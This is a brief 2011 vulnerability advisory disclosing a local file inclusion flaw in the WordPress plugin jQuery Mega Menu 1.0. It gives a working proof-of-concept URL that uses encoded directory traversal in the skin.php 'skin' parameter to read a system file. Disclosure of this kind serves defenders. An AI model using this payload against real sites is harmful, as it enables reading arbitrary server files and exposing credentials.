------------------------------------------------------------------------ Software................WordPress jQuery Mega Menu 1.0 Vulnerability...........Local File Inclusion Download................http://www.designchemical.com/blog/index.php/wordpress-plugins/wordpress-plugin-jquery-drop-down-mega-menu-widget/ Release Date............2/25/2011 Tested On...............Windows 7 + XAMPP ------------------------------------------------------------------------ Author..................AutoSec Tools Site....................http://www.autosectools.com/ ------------------------------------------------------------------------ --Description-- A local file inclusion vulnerability in WordPress jQuery Mega Menu 1.0 can be exploited to include arbitrary files. --PoC-- http://localhost/wordpress/wp-content/plugins/jquery-mega-menu/skin.php?skin=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini